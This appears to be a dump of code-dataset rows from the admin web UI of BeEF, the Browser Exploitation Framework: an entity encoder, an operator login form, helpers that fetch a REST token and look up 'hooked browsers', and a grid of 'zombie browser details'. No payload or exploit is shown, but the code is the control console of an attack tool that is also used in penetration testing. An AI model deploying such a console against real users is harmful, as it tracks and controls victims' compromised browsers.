"]="8968";MAP_ENTITY_TO_CHAR["&rceil"]="8969";MAP_ENTITY_TO_CHAR["&lfloor"]="8970";MAP_ENTITY_TO_CHAR["&rfloor"]="8971";MAP_ENTITY_TO_CHAR["&lang"]="9001";MAP_ENTITY_TO_CHAR["&rang"]="9002";MAP_ENTITY_TO_CHAR["&loz"]="9674";MAP_ENTITY_TO_CHAR["&spades"]="9824";MAP_ENTITY_TO_CHAR["&clubs"]="9827";MAP_ENTITY_TO_CHAR["&hearts"]="9829";MAP_ENTITY_TO_CHAR["&diams"]="9830";for(var entity in MAP_ENTITY_TO_CHAR){if(!(typeof MAP_ENTITY_TO_CHAR[entity]=='function')&&MAP_ENTITY_TO_CHAR.hasOwnProperty(entity)){MAP_CHAR_TO_ENTITY[MAP_ENTITY_TO_CHAR[entity]]=entity;}}
for(var c in MAP_CHAR_TO_ENTITY){if(!(typeof MAP_CHAR_TO_ENTITY[c]=='function')&&MAP_CHAR_TO_ENTITY.hasOwnProperty(c)){var ent=MAP_CHAR_TO_ENTITY[c].toLowerCase().substr(1);ENTITY_TO_CHAR_TRIE.put(ent,String.fromCharCode(c));}}})();if(Object.freeze){$.encoder=Object.freeze($.encoder);$.fn.encode=Object.freeze($.fn.encode);}else if(Object.seal){$.encoder=Object.seal($.encoder);$.fn.encode=Object.seal($.fn.encode);}else if(Object.preventExtensions){$.encoder=Object.preventExtensions($.encoder);$.fn.encode=Object.preventExtensions($.fn.encode);}})(jQuery);
var $jEncoder = jQuery.noConflict(); |
JavaScript | beef/extensions/admin_ui/media/javascript/ui/authentication.js | //
// Copyright (c) 2006-2023 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
Ext.onReady(function() {
submitAuthForm = function() {
login_mask.show();
login_form.getForm().submit({
success: function() {
window.location.href = "<%= @base_path %>/panel"
},
failure: function() {
if(Ext.get('loginError') == null) {
Ext.DomHelper.insertAfter('loadingError', {id:'loginError', html: '<b>ERROR</b>: invalid username or password'});
}
login_mask.hide();
}
});
}
var login_form = new Ext.form.FormPanel({
url: 'authentication/login',
formId: 'login_form',
labelWidth: 125,
frame: true,
title: 'Authentication',
bodyStyle:'padding:5px 5px 0',
width: 350,
defaults: {
width: 175,
inputType: 'password'
},
defaultType: 'textfield',
items: [{
fieldLabel: 'Username',
name: 'username-cfrm',
inputType: 'textfield',
id: 'user',
listeners: {
specialkey: function(field,e) {
if (e.getKey() == e.ENTER) {
submitAuthForm();
}
}
}
},{
fieldLabel: 'Password',
name: 'password-cfrm',
inputType: 'password',
id: 'pass',
listeners: {
specialkey: function(field,e) {
if (e.getKey() == e.ENTER) {
submitAuthForm();
}
}
}
}],
buttons: [{
text: 'Login',
id: 'loginButton',
handler: function() {
submitAuthForm();
}
}]
});
var login_mask = new Ext.LoadMask(Ext.getBody(), {msg:"Authenticating to BeEF..."});
login_form.render('centered');
Ext.DomHelper.append('login_form', {tag: 'div', id: 'loadingError'});
document.getElementById('user').focus();
}); |
JavaScript | beef/extensions/admin_ui/media/javascript/ui/common/beef_common.js | //
// Copyright (c) 2006-2023 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/*!
* BeEF Web UI commons
*/
if(typeof beefwui === 'undefined' && typeof window.beefwui === 'undefined') {
var BeefWUI = {
rest_token: "",
hooked_browsers: {},
/**
* Retrieve the token needed to call the RESTful API.
* This is obviously a post-auth call.
*/
get_rest_token: function() {
if(this.rest_token.length == 0){
var url = "<%= @base_path %>/modules/getRestfulApiToken.json";
jQuery.ajax({
contentType: 'application/json',
dataType: 'json',
type: 'GET',
url: url,
async: false,
processData: false,
success: function(data){
beefwui.rest_token = data.token;
},
error: function(){
beefwui.rest_token = "";
}
});
}
return this.rest_token;
},
/**
* Get hooked browser ID from session
*/
get_hb_id: function(sess){
var id = "";
jQuery.ajax({
type: 'GET',
url: "/api/hooks/?token=" + this.get_rest_token(),
async: false,
processData: false,
success: function(data){
for (var k in data['hooked-browsers']['online']) {
if (data['hooked-browsers']['online'][k].session === sess) {
id = data['hooked-browsers']['online'][k].id;
}
}
if (id === "") {
for (var k in data['hooked-browsers']['offline']) {
if (data['hooked-browsers']['offline'][k].session === sess) {
id = data['hooked-browsers']['offline'][k].id;
}
}
}
},
error: function(){
commands_statusbar.update_fail("Error getting hb id");
}
});
return id;
},
/**
* Get hooked browser info from ID
*/
get_info_from_id: function(id) {
var info = {};
jQuery.ajax({
type: 'GET',
url: "/api/hooks/?token=" + this.get_rest_token(),
async: false,
processData: false,
success: function(data){
for (var k in data['hooked-browsers']['online']) {
if (data['hooked-browsers']['online'][k].id === id) {
info = data['hooked-browsers']['online'][k];
}
}
if (jQuery.isEmptyObject(info)) {
for (var k in data['hooked-browsers']['offline']) {
if (data['hooked-browsers']['offline'][k].id === id) {
info = data['hooked-browsers']['offline'][k];
}
}
}
},
error: function(){
commands_statusbar.update_fail("Error getting hb ip");
}
});
console.log(info);
return info;
}
};
window.beefwui = BeefWUI;
} |
JavaScript | beef/extensions/admin_ui/media/javascript/ui/panel/BrowserDetailsDataGrid.js | //
// Copyright (c) 2006-2023 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
BrowserDetailsDataGrid = function(url, page, base) {
this.page = page;
this.url = url;
this.base = typeof(base) != 'undefined' ? base : {};
// RESTful API token
var token = BeefWUI.get_rest_token();
this.store = new Ext.ux.data.PagingJsonStore({
root: 'details',
autoDestroy: true,
autoLoad: true,
proxy: new Ext.data.HttpProxy({
method: 'GET',
url: url + '?token=' + token
}),
storeId: 'details-store',
baseParams: this.base,
idProperty: 'id',
fields: ['key','value', 'source'],
totalProperty: 'count',
remoteSort: false,
sortInfo: {field: "key", direction: "ASC"}
});
this.bbar = new Ext.PagingToolbar({
pageSize: this.page,
store: this.store,
displayInfo: true,
displayMsg: 'Displaying zombie browser details {0} - {1} of {2}',
emptyMsg: 'No zombie browser data to display'
});
this.columns = [{
id: 'details-key',
header: 'Key',
dataIndex: 'key',
sortable: true,
width: 40,
renderer: function(value) {
return $jEncoder.encoder.encodeForHTML(value);
}
}, {
id: 'details-value',
header: "Value",
dataIndex: 'value',
sortable: true,
width: 60,
renderer: function(value) {
return $jEncoder.encoder.encodeForHTML(value);
}
},
];
BrowserDetailsDataGrid.superclass.constructor.call(this, {
region: 'center',
id: 'topic-grid',
loadMask: {msg:'Loading Feed...'},
sm: new Ext.grid.RowSelectionModel({
singleSelect: true
}),
viewConfig: {
forceFit: true
},
listeners: {
afterrender: function(datagrid) {
datagrid.store.reload({params:{start:0, limit:datagrid.page, sort:"key", dir:"ASC"}});
},
rowclick: function(grid, rowIndex) {
var r = grid.getStore().getAt(rowIndex).data;
},
containercontextmenu: function(view, e) {
e.preventDefault();
},
}
}) // BrowserDetailsDataGrid.superclass
}
Ext.extend(BrowserDetailsDataGrid, Ext.grid.GridPanel, {});
Ext.override(Ext.PagingToolbar, {
doRefresh: function() {
delete this.store.lastParams;
this.doLoad(this.cursor);
}
}); |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.